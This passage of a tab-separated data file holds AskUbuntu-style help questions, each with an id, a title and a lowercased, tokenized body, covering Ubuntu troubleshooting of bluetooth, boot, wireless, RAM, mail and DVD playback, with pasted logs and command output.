] fat-fs ( sdb ) : unable to read boot sector [ 3745.235833 ] fat-fs ( sdb ) : unable to read boot sector could anyone help me ? thanks a lot . henry .
396482	how to build indicator-bluetooth ?	i have installed ubuntu 13.10 x64 on an asus g750jx . i had windows 8.1 but it is now gone . tried to turn on bluetooth in system settings but as soon as i close system settings , bluetooth goes back to off dmesg | grep -i bluetooth : [ 22.273402 ] bluetooth : core ver 2.16 [ 22.273417 ] bluetooth : hci device and connection manager initialized [ 22.273424 ] bluetooth : hci socket layer initialized [ 22.273426 ] bluetooth : l2cap socket layer initialized [ 22.273430 ] bluetooth : sco socket layer initialized [ 22.288979 ] bluetooth : rfcomm tty layer initialized [ 22.288989 ] bluetooth : rfcomm socket layer initialized [ 22.288990 ] bluetooth : rfcomm ver 1.11 [ 22.358638 ] bluetooth : bnep ( ethernet emulation ) ver 1.3 [ 22.358641 ] bluetooth : bnep filters : protocol multicast [ 22.358647 ] bluetooth : bnep socket layer initialized that would mean , bluetooth is present and being acknowledge . i could be wrong ps aux| grep bluetooth : root 1077 0.0 0.0 19264 1724 ? ss 18:56 0:00 /usr/sbin/bluetoothd zongo 2490 0.0 0.0 263544 2952 ? sl 18:56 0:00 /usr/lib/x86_64-linux-gnu/indicator-bluetooth/indicator-bluetooth-service zongo 4488 0.0 0.0 13656 968 pts/2 s+ 19:35 0:00 grep -- color=auto bluetooth i seem to have bluetooth daemon running . i concluded that my hardware is being acknowledge and that the daemon does start with no issue . why is bluetooth off in 'system settings ' ? i went back trolling the net and found a patch specially written for this issue . bluetooth issues ubuntu 13.10 so back to the terminal : sudo apt-get install bzr build-essential sudo apt-get build-dep indicator-bluetooth sudo bzr branch lp : ~robert-ancell/indicator-bluetooth/dont-hide-on-rfkill cd dont-hide-on-rfkill dpkg-buildpackage ( -d as dependencies unmet ) cd sudo dpkg -i indicator-bluetooth_0.0.6daily13.02.19-0ubuntu1_amd64.deb but it did not finished and i got the error below configure : exit 1 dh_auto_configure : ./configure -- build=x86_64-linux-gnu -- prefix=/usr -- includedir= $ { prefix } /include -- mandir= $ { prefix } /share/man -- infodir= $ { prefix } /share/info -- sysconfdir=/etc -- localstatedir=/var -- libdir= $ { prefix } /lib/x86_64-linux-gnu -- libexecdir= $ { prefix } /lib/x86_64-linux-gnu -- disable-maintainer-mode -- disable-dependency-tracking returned exit code 1 yours truly is out now as this is too technical for me . anyone out there has any ideas of what is going on and most of all has a fix that i could implement ?
396483	boot shows failing processes after upgrading packages and rebooting	i am really new to this , so if i did something wrong that is obvious to you , please just let me know because i have no idea what is happening . when i installed ubuntu 13.10 , i went through all the set up like set a password and what not and everything seemed to work fine . once i finally got to the desktop and had everything working ( or so i thought ) there was an icon on the side that had popped up saying that there have been updates to programs or something . when i clicked on details i saw that things like firefox and a few other programs had updates , so my first reaction was to install them . after the install it requested that i reboot , and so i did . the grub boot menu popped up and i selected ubuntu and it seemed to be loading up . however , a black screen showed with processes that kept failing , and eventually the screen would be stuck on either the terminal or the ubuntu loading screen with the dots indefinitely . this happened all 4 times that i installed ubuntu from fresh . this time i have not updated any of the programs , hoping it works . has anyone experienced this ? and is there anything that i should do the make sure this does n't happen again ?
396484	how to free the memory used by qemu-system_x86_64 after guest is shutoff ? ( kvm )	i have kvm installed and i use virt-manager to manage the guests . after i have shut off all the guests , i still see qemu-system-x86_64 processes in my system , they take a lot of memory . is there a way to free the memory used by these processes . ( i do n't kill them , because i do n't know if killing them can cause problems or not ) . my os version is ubuntu desktop 13.10 .
396487	why ca n't i create a file in â/â or main directory in ubuntu ?	i am trying to create a file in `` / '' directory ( which contains bin , boot , cdrom , dev , etc ) but i am unable to do so . although i am the one who install ubuntu and i am the root user ? the error i get is of permission denied . when i used sudo it asks for password but i have n't set any password for it . also i can not calculate the hash of a file in this directory . i am sorry for my lame question as i just have switched to linux after using windows for long time .
396489	optirun with running browser	problem : i have a window of firefox or of chrome opened via the launcher in the menu and now i want to run another instance of the program that take advantages of my dedicated nvidia card , via optirun firefox or primusrum firefox what i expect : like in any other program , the already opened one stays there and continue using the integrated graphinc card , while another window opens and take advantages of the dedicated card . what i obtain : the new window somehow uses something of the old one and does not take advantage of the optimus technology . important note 1 : if i run optirun firefox or optirun google-chrome when the program is not previously running , the expected behaviour matches what happens , i.e . the browser uses the dedicated gpu . important note 2 : it is not a problem of profiles . running firefox with another profile ( as suggested here ) does not change the wrong behaviour . so , any hint on how to solve this problem ? is there any parameter that one should pass to the program to make it ignore the other instance and obtain the expected behaviour ? many thanks in advance . less relevant informations on system configuration ubuntu version : kubuntu 13.10 firefox version : 26.0 chrome version : 31.0.1650.63
396491	why is a huawei e3276 so slow on ubuntu 13.10 ?	i 've been trying to install a huawei e3276 usb modem on a ubuntu 13.10 for a while now with little success . i finally was able to put it to work following the suggestions here . after sending the suggested at commands directly to it , the option to create a mobile broadband connection finally appears in the connections screen . now my problem is that when i do an online speed test , i 'm getting less than 1mb download , from the ~15mb i get from a windows 7 laptop just beside it . using a usb extension to position the modem somewhere else does n't help , so it must be something with the driver or the at commands . any idea on how to get speeds closer to the ones on windows ?
396494	gparted does n't find partitions	i 'm trying to install a dual boot on ssd 120 gb using win 7 and ubuntu 13.10/12.04 . to avoid redundant trouble i 'm trying to install win7 first ( and partition the system there ) and then use that partitioning to install linux . however , after a successful windows installation when i open gparted ( from a live cd ) and it says that all the devices have unallocated memory ( only ssd shown on the screen but every single device has same thing ) . when i proceed to installation i get the same unallocated spaces thing . question : what can be the reason of this and how can i resolve it to simply install ubuntu on ssd ?
396495	slow wireless on linux ubuntu 12.04.3 ( lenovo y510p )	i have a lenovo ideapad y510p ( intel centrino 2230 and kernel 3.8.0-34-generic ) , running ubuntu 12.04.3 and i 'm getting consistently lower wireless internet speeds when compared with my old computer 's . in the same room the old computer returns 30.34 mbps while the lenovo returns 8 mbps . i 've tried to add options iwlwifi 11n_disable=1 to /etc/modprobe.d/iwlwifi-disable11n.conf and to /etc/modprobe.d/iwlwifi.conf but there was no change . what else can i do ? references : how to fix slow wireless on machines with intel wireless cards ?
396496	shutting down the pc from java application	i am trying to shut down my ubuntu pc using a java application , but nothing seems to happen . following is my code : runtime runtime = runtime.getruntime ( ) ; try { process proc = runtime.exec ( `` sudo shutdown -h now '' ) ; } catch ( ioexception e ) { e.printstacktrace ( ) ; } what am i missing ?
396498	how do i find the starting and end block numbers of a file using terminal in ubuntu ?	is there any command that will output the beginning and ending hard disk blocks of a file ? ( solution marked accepted ) update : the answers below solve the initial query . i thank 'em all . but i 'm a bit confused with lba not fitting in the block range shown by fdisk . ( however , halving the number aggreees with range ; so does that imply lba blocksize of 2048 ? ! ? )
396500	automatic shutdown problem in 12.04	i am facing a big problem with my ubuntu 12.04.one day i updated my system after that it act as some one has put virus in my laptop . whenever i open the home folder it automatically replicates itself and open continuously lots of tab and ultimately automatically get shut down.i did format my pc and install again 12.04 but now when i backup my data and play any video the pc automatically get shut down . how to fix this ? i tried lot to find the solution for the problem but failed . if any one has any idea why this is happening so then plz help me .
396503	unable to install ubuntu sdk	while installing sudo apt-get install ubuntu-sdk , i am facing this the following packages have unmet dependencies : ubuntu-sdk : depends : qtcreator-plugin-ubuntu-cordova but it is not going to be installed e : unable to correct problems , you have held broken packages .
396516	how to run a nohup script with upstart ?	i 'm porting some sysv-style service scripts for hbase ( a java service ) to upstart . the sysv scripts do n't call java directly , but instead call hbase-daemon.sh . this is a start-stop-daemon-like tool that ships with the package which pulls in a lot of configuration and ultimately ends in a nohup java ... & to actually run the process as a daemon . since the configuration logic in hbase-daemon.sh is involved , i would rather not modify or rewrite it ( to remove the nohup ) and instead have upstart call it directly . this seems to be what the expect clause is for , except in my case it is n't working . even with expect daemon ( the two fork case ) , i end up tracking the wrong pid on service start . this suggests that my scenario is forking too much , or perhaps nohup should n't be handled with expect , or yet something else . how can i use upstart to manage a service that expects to be started with a script that calls nohup ?
396517	screen freezing while moving large files to external disk	i have ubuntu 13.04 , while moving large files to external disk using nautilus or thunar screen is freezing , i have to push power button to reboot . i have 3.8.0-34-generic kernel installed . would you please help me debug the problem ? regards .
396518	creating bootable usb for new computer from mac	do i need to do the steps as described on the site for making a bootable usb from mac if i intend to run it on a new desktop ? the dvd drive on the computer i built is acting peculiar so i 'm trying to bypass this . thanks for all your help
396519	hp1030nr installation	i 'm trying to install ubuntu into my hp mini 1030nr to replace windows xp via the usb drive . i 've followed the directions but the computer keeps booting into xp rather than the ubuntu on the thumb drive . any suggestions ?
396522	plextor px-tv402u can not install drivers mythbuntu 3.2.0-33	is it possible to work a plextor px-tv402u in ubuntu 12.04 ? i have linux headers 3.2.0-33 generic installed and mythbuntu 0.27 i tried to patch the drivers but it does n't work thanks for help
396525	eclipse crashing on startup	i am using 64-bit ubuntu 13.10 and i have eclipse ( exactly adt-bundle-linux-x86_64-20131030 ) with sdk , i am trying to learn how to make my own android application but eclipse is closing automatically and randomly with no errors or warning . i run it in terminal and then it shows me some issues . this is the terminal output : a fatal error has been detected by the java runtime environment : sigsegv ( 0xb ) at pc=0x00007fbcae8f2c91 , pid=5707 , tid=140449979574016 jre version : 7.0_25-b30 java vm : openjdk 64-bit server vm ( 23.7-b01 mixed mode linux-amd64 compressed oops ) problematic frame : c [ libsoup-2.4.so.1+0x6ac91 ] soup_session_feature_detach+0x11 failed to write core dump . core dumps have been disabled . to enable core dumping , try `` ulimit -c unlimited '' before starting java again an error report file with more information is saved as : /home/anarki/dokumenty/adt-bundle-linux-x86_64-20131030/eclipse/hs_err_pid5707.log if you would like to submit a bug report , please include instructions on how to reproduce the bug and visit : https : //bugs.launchpad.net/ubuntu/+source/openjdk-7/ the crash happened outside the java virtual machine in native code . see problematic frame for where to report the bug .
396526	qjoypad 4.1 : no gui	i am trying to open/find the gui for qjoypad 4.1 on ubuntu 13.10 . i installed qjoypad via synaptic using the default repositories . i see the tray icon , but i can not get the window that i see in this answer ( http : //askubuntu.com/a/225484/158340 ) . where/how can i get this window to configure my joystick ?
396528	extend screen size	i was trying to extend the screen size to get it bigger than the actual monitor , so that my monitor shows just the leftmost part of the screen and the other ( half ? ) part just stay hidden ( but i can drag there windows ) . the idea is that i can use vnc to show on my tablet the `` hidden part '' of the screen ( and i know i can / how to do this ) . i 've tried to use xrandr -- fb < w > x < h > and it extend the screen size , but i ca n't drag windows there ( it remains a cold black area.. ) .
396531	how to leave a picture for background of the grub ?	i want to change the background of the grub and leave a picture for it`s black color . is it possible to do this ? thanks for your any advance .
396534	install ubuntu from usb on macbook	i 'm trying to install ubuntu on an old macbook ( 2008 model ) and have followed the instructions on http : //www.ubuntu.com/download/desktop/create-a-usb-stick-on-mac-osx . this however when i insert this usb in the macbook and press alt it only shows the harddisk as an available boot . i have already tested this usb as a live usb on my new hp laptop and that worked fine , however my macbook does not recognize it . i hope i 'm in the right place as this is a bit of a cross site question ( could also be asked on ask differently ) .
396536	pci or usb video card with unity support for legacy computer	i was given an hp pavillion 8756c from 1999 that i 'm considering refurbishing for a friend 's kid . it runs ubuntu 13.10 and performance is actually pretty decent except for unity . i 'd like to get unity running decently because i 'd like to get ubuntu 14.04 lts on here . this will provide him with a modern system to learn on , and by the time 16.04 lts is a consideration he 'll be ready for a brand new system . this system only has pci slots , so i 'm hoping there 's either a pci video card that will offer unity support , or alternatively a usb graphics adapter that accomplish the same .
396539	how to sync 2 folders every day ?	i am moving a firefox profile folder on my ssd disk to fully utilize ssd 's speed . however to prevent accidental formatting of this folder , i also want to have a daily sync with another folder on internal hard disk which i never format . how can i do this ? am i forced to use rsync with cron or there is a tool which can do all this automatically ? i have never used rsync or cron before .
396540	skype port : open or closed ?	both ubuntu 12.04 sudo netstat , sudo ufw status , and my firewall gfw assure me that my port at skype is open and listened to but the free port scanners on the internet all show it not open what gives ? who is correct and why is the other wrong is the port really not open or closed , but filtered ? if that 's the case , can i still use skype ? thanks
396541	system not showing all 2560mb ( 2gb + 512mb ) of the ram	heres my problem i have a 2 gig ramcard and a 512mb ram but only 2142 mb appear in total available ram how do i make it use the second card ? heres some info @ : ~ $ free -m total used free shared buffers cached mem : 2142 1032 1109 0 31 351 -/+ buffers/cache : 649 1493 swap : 3244 114 3129 @ : ~ $ sudo dmidecode -- type memory [ sudo ] password for : # dmidecode 2.11 smbios 2.4 present . handle 0x0015 , dmi type 16 , 15 bytes physical memory array location : system board or motherboard use : system memory error correction type : none maximum capacity : 4 gb error information handle : not provided number of devices : 2 handle 0x0016 , dmi type 17 , 27 bytes memory device array handle : 0x0015 error information handle : no error total width : 128 bits data width : 64 bits size : 2048 mb form factor : dimm set : 1 locator : s1 bank locator : dimm1 type : ddr2 type detail : synchronous speed : unknown manufacturer : not specified serial number : not specified asset tag : not specified part number : not specified handle 0x0017 , dmi type 17 , 27 bytes memory device array handle : 0x0015 error information handle : no error total width : 128 bits data width : 64 bits size : 512 mb form factor : dimm set : 2 locator : s2 bank locator : dimm2 type : ddr2 type detail : synchronous speed : unknown manufacturer : not specified serial number : not specified asset tag : not specified part number : not specified
396543	hdmi audio handshake persistence	i have not found another question like this , even after extensive searching here and via google . ubuntu 12.04.3 , 64-bit , nvidia . i use this tower as an htpc . hdmi works for both audio and video . however , there is a handshake persistence issue . i do not have this issue with anything else connected to my home theatre receiver ( ex . my ps3 keeps the audio on at all times ) . it is most noticeable when using every type of jukebox , with the audio `` disconnecting '' between songs , then coming back on after 3-5 seconds ( even 'gapless ' players like quod libet ) . it also happens with every other application . is there a way to keep hdmi audio on at all times ? what file do i change in order to keep hdmi audio persistent ? edit - to add , if i am watching something in a browser ( like netflix ) , the sound is always on , even if i pause or switch to another tab . why is this impossible otherwise ?
396545	how to become a permanent root user in ubuntu	i have found some solutions but what i want to do is i want to become a root user `` permanently '' . when i restart computer i still want to stay as a root user . i do n't want to use termanial everytime to become a root user . is there any idea ?
396546	gnome3 system settings dialog crash	i am using gnome , and have recently upgraded it to version 3.10. however , now i am having several problems . no wallpaper is shown on desktop . however , it is visible after super key is pressed ( do n't know how this regime is called - it is when one can drag windows between desctops etc . - overlay mode ? ) system settings dialog does not launch . how can i determine the reasons for that behaviour and fix it ?
396547	ubuntu 12.04 , php5-fpm , apache2 , postfix : impossible to send a mail with php	resources i followed i followed several howtos and questions on askubuntu : https : //help.ubuntu.com/community/postfix how to configure apache / php / postfix website emails when using vhosts ? sending mails with php , lampp and postfix and it does not fix my issue . configuration this is a kimsufi server from ovh , quad core with 2 gb of memory i just installed the basic ubuntu 12.04 lts server i then installed apache2 , php-fpm , mysql , two custom cron scripts for backup i use it for a multisite wordpress , where i manage my blog and blogs of family and friends , plus a few customers issue php-fpm can not send email , even after following official community documention on ubuntu wiki , and other tips and tricks i find . for php , it seems that the email is sent , but the test mail never come in my inbox ... what do i miss ? is there a very simple solution ? by the way , when this will be fixed , i would be happy to write a full howto about that . /var/log/mail.log http : //pastebin.com/8j7y1upw
396548	unable to play dvd movies	since upgrading from ubuntu 10.10 to 12 and then to 13 , i 've got a problem with playing movies form dvd 's . when i was using 10.10 version everything was fine , and i did n't have any problems with this issue . i am still using the same notebook with the same drive . dvds with data are working fine . i followed all the instructions posted here : https : //help.ubuntu.com/community/restrictedformats/playingdvds that means that i 've got installed current version of libdvdcss ( i installed it by restricted-estras , but also alon ) . after alone installation i executed sudo /usr/share/doc/libdvdread4/install-css.sh . because vlc and mplayer were still unable to play dvds , i installed regionset package . than i checked my regionset ( and change it from 2 to 2 , to be absolutely sure ) . after those steps dvds are still not playable . i tried playing movies with and without enabled menus . i also chmod 660 dev/sr0 and dev/cdrom , and than chgrp them . nothing has worked for me and dvds are stil unplayable . when /dvd/sr0 is set vlc gives this : libdvdnav : using dvdnav version 4.2.0 libdvdread : using libdvdcss version 1.2.13 for dvd access libdvdread : could not open /dev/sr0 with libdvdcss . libdvdread : ca n't open /dev/sr0 for reading libdvdnav : vm : failed to open/read the dvd libdvdread : using libdvdcss version 1.2.13 for dvd access libdvdread : could not open /dev/sr0 with libdvdcss . libdvdread : ca n't open /dev/sr0 for reading [ 0xb52042e8 ] dvdread demux error : dvdread can not open source : /dev/sr0 [ 0xb5200618 ] main input error : open of `dvd : ///dev/sr0 ' failed when /dev/dvd/ : libdvdnav : using dvdnav version 4.2.0 libdvdread : using libdvdcss version 1.2.13 for dvd access libdvdread : ca n't stat /dev/dvd nie ma takiego pliku ani katalogu libdvdread : could not open /dev/dvd libdvdnav : vm : failed to open/read the dvd libdvdread : using libdvdcss version 1.2.13 for dvd access libdvdread : ca n't stat /dev/dvd nie ma takiego pliku ani katalogu libdvdread : could not open /dev/dvd [ 0xb5203b68 ] dvdread demux error : dvdread can not open source : /dev/dvd [ 0xb5204b18 ] main input error : open of `dvd : ///dev/dvd ' failed sudo apt-get install dvd+rw-tools command gives this ( dvd is in the drive ) : : inquiry : [ hl-dt-st ] [ dvdram gsa-t50n ] [ rt04 ] get [ current ] configuration : : - ( no media mounted , exiting ... [ ls -al /dev/ command gives this : razem 4 drwxr-xr-x 16 root root 4080 gru 23 16:18 . drwxr-xr-x 22 root root 4096 gru 7 10:35 .. crw -- -- -- - 1 root root 10 , 235 gru 23 16:18 autofs drwxr-xr-x 2 root root 620 gru 23 16:17 block drwxr-xr-x 2 root root 80 gru 23 16:17 bsg crw -- -- -- - 1 root root 10 , 234 gru 23 16:18 btrfs-control drwxr-xr-x 3 root root 60 gru 23 16:17 bus lrwxrwxrwx 1 root root 3 gru 23 16:23 cdrom - > sr0 drwxr-xr-x 2 root root 3820 gru 23 16:18 char crw -- -- -- - 1 root root 5 , 1 gru 23 16:18 console lrwxrwxrwx 1 root root 11 gru 23 16:17 core - > /proc/kcore drwxr-xr-x 2 root root 60 gru 23 16:18 cpu crw -- -- -- - 1 root root 10 , 60 gru 23 16:18 cpu_dma_latency drwxr-xr-x 4 root root 80 gru 23 16:17 disk drwxr-xr-x 2 root root 80 gru 23 16:18 dri crw -- -- -- - 1 root root 10 , 61 gru 23 16:18 ecryptfs crw-rw -- -- 1 root video 29 , 0 gru 23 16:18 fb0 lrwxrwxrwx 1 root root 13 gru 23 16:17 fd - > /proc/self/fd crw-rw-rw- 1 root root 1 , 7 gru 23 16:18 full crw-rw-rw- 1 root root 10 , 229 gru 23 16:18 fuse crw -- -- -- - 1 root root 251 , 0 gru 23 16:18 fw0 crw -- -- -- - 1 root root 250 , 0 gru 23 16:18 hidraw0 crw -- -- -- - 1 root root 10 , 228 gru 23 16:18 hpet lrwxrwxrwx 1 root root 14 gru 23 16:17 .initramfs - > /run/initramfs drwxr-xr-x 4 root root 380 gru 23 16:18 input crw-r -- r -- 1 root root 1 , 11 gru 23 16:18 kmsg srw-rw-rw- 1 root root 0 gru 23 16:18 log brw-rw -- -- 1 root disk 7 , 0 gru 23 16:18 loop0 brw-rw -- -- 1 root disk 7 , 1 gru 23 16:18 loop1 brw-rw -- -- 1 root disk 7 , 2 gru 23 16:18 loop2 brw-rw -- -- 1 root disk 7 , 3 gru 23 16:18 loop3 brw-rw -- -- 1 root disk 7 , 4 gru 23 16:18 loop4 brw-rw -- -- 1 root disk 7 , 5 gru 23 16:18 loop5 brw-rw -- -- 1 root disk 7 , 6 gru 23 16:18 loop6 brw-rw -- -- 1 root disk 7 , 7 gru 23 16:18 loop7 crw -- -- -- - 1 root root 10 , 237 gru 23 16:18 loop-control drwxr-xr-x 2 root root 60 gru 23 16:17 mapper crw -- -- -- - 1 root root 10 , 227 gru 23 16:18 mcelog crw-r -- -- - 1 root kmem 1 , 1 gru 23 16:18 mem drwxr-xr-x 2 root root 60 gru 23 16:17 net crw -- -- -- - 1 root root 10 , 59 gru 23 16:18 network_latency crw -- -- -- - 1 root root 10 , 58 gru 23 16:18 network_throughput crw-rw-rw- 1 root root 1 , 3 gru 23 16:18 null crw-r -- -- - 1 root kmem 1 , 4 gru 23 16:18 port crw -- -- -- - 1 root root 108 , 0 gru 23 16:18 ppp crw -- -- -- - 1 root root 10 , 1 gru 23 16:18 psaux crw-rw-rw- 1 root tty 5 , 2 gru 23 16:26 ptmx drwxr-xr-x 2 root root 0 gru 23 16:17 pts brw-rw -- -- 1 root disk 1 , 0 gru 23 16:18 ram0 brw-rw -- -- 1 root disk 1 , 1 gru 23 16:18 ram1 brw-rw -- -- 1 root disk 1 , 10 gru 23 16:18 ram10 brw-rw -- -- 1 root disk 1 , 11 gru 23 16:18 ram11 brw-rw -- -- 1 root disk 1 , 12 gru 23 16:18 ram12 brw-rw -- -- 1 root disk 1 , 13 gru 23 16:18 ram13 brw-rw -- -- 1 root disk 1 , 14 gru 23 16:18 ram14 brw-rw -- -- 1 root disk 1 , 15 gru 23 16:18 ram15 brw-rw -- -- 1 root disk 1 , 2 gru 23 16:18 ram2 brw-rw -- -- 1 root disk 1 , 3 gru 23 16:18 ram3 brw-rw -- -- 1 root disk 1 , 4 gru 23 16:18 ram4 brw-rw -- -- 1 root disk 1 , 5 gru 23 16:18 ram5 brw-rw -- -- 1 root disk 1 , 6 gru 23 16:18 ram6 brw-rw -- -- 1 root disk 1 , 7 gru 23 16:18 ram7 brw-rw -- -- 1 root disk 1 , 8 gru 23 16:18 ram8 brw-rw -- -- 1 root disk 1 , 9 gru 23 16:18 ram9 crw-rw-rw- 1 root root 1 , 8 gru 23 16:18 random crw-rw-r -- + 1 root root 10 , 62 gru 23 16:18 rfkill lrwxrwxrwx 1 root root 4 gru 23 16:18 rtc - > rtc0 crw -- -- -- - 1 root root 254 , 0 gru 23 16:18 rtc0 brw-rw -- -- 1 root disk 8 , 0 gru 23 16:18 sda brw-rw -- -- 1 root disk 8 , 1 gru 23 16:18 sda1 brw-rw -- -- 1 root disk 8 , 2 gru 23 16:18 sda2 brw-rw -- -- 1 root disk 8 , 5 gru 23 16:18 sda5 crw-rw -- -- 1 root disk 21 , 0 gru 23 16:18 sg0 crw-rw -- -- + 1 root cdrom 21 , 1 gru 23 16:18 sg1 lrwxrwxrwx 1 root root 8 gru 23 16:18 shm - > /run/shm crw -- -- -- - 1 root root 10 , 231 gru 23 16:18 snapshot drwxr-xr-x 3 root root 280 gru 23 16:18 snd brw-rw -- -- + 1 root cdrom 11 , 0 gru 23 16:23 sr0 lrwxrwxrwx 1 root root 15 gru 23 16:17 stderr - > /proc/self/fd/2 lrwxrwxrwx 1 root root 15 gru 23 16:17 stdin - > /proc/self/fd/0 lrwxrwxrwx 1 root root 15 gru 23 16:17 stdout - > /proc/self/fd/1 crw-rw-rw- 1 root tty 5 , 0 gru 23 16:22 tty crw -- w -- -- 1 root tty 4 , 0 gru 23 16:18 tty0 crw-rw -- -- 1 root tty 4 , 1 gru 23 16:18 tty1 crw -- w -- -- 1 root tty 4 , 10 gru 23 16:18 tty10 crw -- w -- -- 1 root tty 4 , 11 gru 23 16:18 tty11 crw -- w -- -- 1 root tty 4 , 12 gru 23 16:18 tty12 crw -- w -- -- 1 root tty 4 , 13 gru 23 16:18 tty13 crw -- w -- -- 1 root tty 4 , 14 gru 23 16:18 tty14 crw -- w -- -- 1 root tty 4 , 15 gru 23 16:18 tty15 crw -- w -- -- 1 root tty 4 , 16 gru 23 16:18 tty16 crw -- w -- -- 1 root tty 4 , 17 gru 23 16:18 tty17 crw -- w -- -- 1 root tty 4 , 18 gru 23 16:18 tty18 crw -- w -- -- 1 root tty 4 , 19 gru 23 16:18 tty19 crw-rw -- -- 1 root tty 4 , 2 gru 23 16:18 tty2 crw -- w -- -- 1 root tty 4 , 20 gru 23 16:18 tty20 crw -- w -- -- 1 root tty 4 , 21 gru 23 16:18 tty21 crw -- w -- -- 1 root tty 4 , 22 gru 23 16:18 tty22 crw -- w -- -- 1 root tty 4 , 23 gru 23 16:18 tty23 crw -- w -- -- 1 root tty 4 , 24 gru 23 16:18 tty24 crw -- w -- -- 1 root tty 4 , 25 gru 23 16:18 tty25 crw -- w -- -- 1 root tty 4 , 26 gru 23 16:18 tty26 crw -- w -- -- 1 root tty 4 , 27 gru 23 16:18 tty27 crw -- w -- -- 1 root tty 4 , 28 gru 23 16:18 tty28 crw -- w -- -- 1 root tty 4 , 29 gru 23 16:18 tty29 crw-rw -- -- 1 root tty 4 , 3 gru 23 16:18 tty3 crw -- w -- -- 1 root tty 4 , 30 gru 23 16:18 tty30 crw -- w -- -- 1 root tty 4 , 31 gru 23 16:18 tty31 crw -- w -- -- 1 root tty 4 , 32 gru 23 16:18 tty32 crw -- w -- -- 1 root tty 4 , 33 gru 23 16:18 tty33 crw -- w -- -- 1 root tty 4 , 34 gru 23 16:18 tty34 crw -- w -- -- 1 root tty 4 , 35 gru 23 16:18 tty35 crw -- w -- -- 1 root tty 4 , 36 gru 23 16:18 tty36 crw -- w -- -- 1 root tty 4 , 37 gru 23 16:18 tty37 crw -- w -- -- 1 root tty 4 , 38 gru 23 16:18 tty38 crw -- w -- -- 1 root tty 4 , 39 gru 23 16:18 tty39 crw-rw -- -- 1 root tty 4 , 4 gru 23 16:18 tty4 crw -- w -- -- 1 root tty 4 , 40 gru 23 16:18 tty40 crw -- w -- -- 1 root tty 4 , 41 gru 23 16:18 tty41 crw -- w -- -- 1 root tty 4 , 42 gru 23 16:18 tty42 crw -- w -- -- 1 root tty 4 , 43 gru 23 16:18 tty43 crw -- w -- -- 1 root tty 4 , 44 gru 23 16:18 tty44 crw -- w -- -- 1 root tty 4 , 45 gru 23 16:18 tty45 crw -- w -- -- 1 root tty 4 , 46 gru 23 16:18 tty46 crw -- w -- -- 1 root tty 4 , 47 gru 23 16:18 tty47 crw -- w -- -- 1 root tty 4 , 48 gru 23 16:18 tty48 crw -- w -- -- 1 root tty 4 , 49 gru 23 16:18 tty49 crw-rw -- -- 1 root tty 4 , 5 gru 23 16:18 tty5 crw -- w -- -- 1 root tty 4 , 50 gru 23 16:18 tty50 crw -- w -- -- 1 root tty 4 , 51 gru 23 16:18 tty51 crw -- w -- -- 1 root tty 4 , 52 gru 23 16:18 tty52 crw -- w -- -- 1 root tty 4 , 53 gru 23 16:18 tty53 crw -- w -- -- 1 root tty 4 , 54 gru 23 16:18 tty54 crw -- w -- -- 1 root tty 4 , 55 gru 23 16:18 tty55 crw -- w -- -- 1 root tty 4 , 56 gru 23 16:18 tty56 crw -- w -- -- 1 root tty 4 , 57 gru 23 16:18 tty57 crw -- w -- -- 1 root tty 4 , 58 gru 23 16:18 tty58 crw -- w -- -- 1 root tty 4 , 59 gru 23 16:18 tty59 crw-rw -- -- 1 root tty 4 , 6 gru 23 16:18 tty6 crw -- w -- -- 1 root tty 4 , 60 gru 23 16:18 tty60 crw -- w -- -- 1 root tty 4 , 61 gru 23 16:18 tty61 crw -- w -- -- 1 root tty 4 , 62 gru 23 16:18 tty62 crw -- w -- -- 1 root tty 4 , 63 gru 23 16:18 tty63 crw -- w -- -- 1 root tty 4 , 7 gru 23 16:18 tty7 crw -- w -- -- 1 root tty 4 , 8 gru 23 16:18 tty8 crw -- w -- -- 1 root tty 4 , 9 gru 23 16:18 tty9 crw -- -- -- - 1 root root 5 , 3 gru 23 16:18 ttyprintk crw-rw -- -- 1 root dialout 4 , 64 gru 23 16:18 ttys0 crw-rw -- -- 1 root dialout 4 , 65 gru 23 16:18 ttys1 crw-rw -- -- 1 root dialout 4 , 74 gru 23 16:18 ttys10 crw-rw -- -- 1 root dialout 4 , 75 gru 23 16:18 ttys11 crw-rw -- -- 1 root dialout 4 , 76 gru 23 16:18 ttys12 crw-rw -- -- 1 root dialout 4 , 77 gru 23 16:18 ttys13 crw-rw -- -- 1 root dialout 4 , 78 gru 23 16:18 ttys14 crw-rw -- -- 1 root dialout 4 , 79 gru 23 16:18 ttys15 crw-rw -- -- 1 root dialout 4 , 80 gru 23 16:18 ttys16 crw-rw -- -- 1 root dialout 4 , 81 gru 23 16:18 ttys17 crw-rw -- -- 1 root dialout 4 , 82 gru 23 16:18 ttys18 crw-rw -- -- 1 root dialout 4 , 83 gru 23 16:18 ttys19 crw-rw -- -- 1 root dialout 4 , 66 gru 23 16:18 ttys2 crw-rw -- -- 1 root dialout 4 , 84 gru 23 16:18 ttys20 crw-rw -- -- 1 root dialout 4 , 85 gru 23 16:18 ttys21 crw-rw -- -- 1 root dialout 4 , 86 gru 23 16:18 ttys22 crw-rw -- -- 1 root dialout 4 , 87 gru 23 16:18 ttys23 crw-rw -- -- 1 root dialout 4 , 88 gru 23 16:18 ttys24 crw-rw -- -- 1 root dialout 4 , 89 gru 23 16:18 ttys25 crw-rw -- -- 1 root dialout 4 , 90 gru 23 16:18 ttys26 crw-rw -- -- 1 root dialout 4 , 91 gru 23 16:18 ttys27 crw-rw -- -- 1 root dialout 4 , 92 gru 23 16:18 ttys28 crw-rw -- -- 1 root dialout 4 , 93 gru 23 16:18 ttys29 crw-rw -- -- 1 root dialout 4 , 67 gru 23 16:18 ttys3 crw-rw -- -- 1 root dialout 4 , 94 gru 23 16:18 ttys30 crw-rw -- -- 1 root dialout 4 , 95 gru 23 16:18 ttys31 crw-rw -- -- 1 root dialout 4 , 68 gru 23 16:18 ttys4 crw-rw -- -- 1 root dialout 4 , 69 gru 23 16:18 ttys5 crw-rw -- -- 1 root dialout 4 , 70 gru 23 16:18 ttys6 crw-rw -- -- 1 root dialout 4 , 71 gru 23 16:18 ttys7 crw-rw -- -- 1 root dialout 4 , 72 gru 23 16:18 ttys8 crw-rw -- -- 1 root dialout 4 , 73 gru 23 16:18 ttys9 drwxr-xr-x 3 root root 60 gru 23 16:18 .udev crw -- -- -- - 1 root root 10 , 239 gru 23 16:18 uhid crw -- -- -- - 1 root root 10 , 223 gru 23 16:18 uinput crw-rw-rw- 1 root root 1 , 9 gru 23 16:18 urandom drwxr-xr-x 4 root root 80 gru 23 16:18 v4l crw-rw -- -- 1 root tty 7 , 0 gru 23 16:18 vcs crw-rw -- -- 1 root tty 7 , 1 gru 23 16:18 vcs1 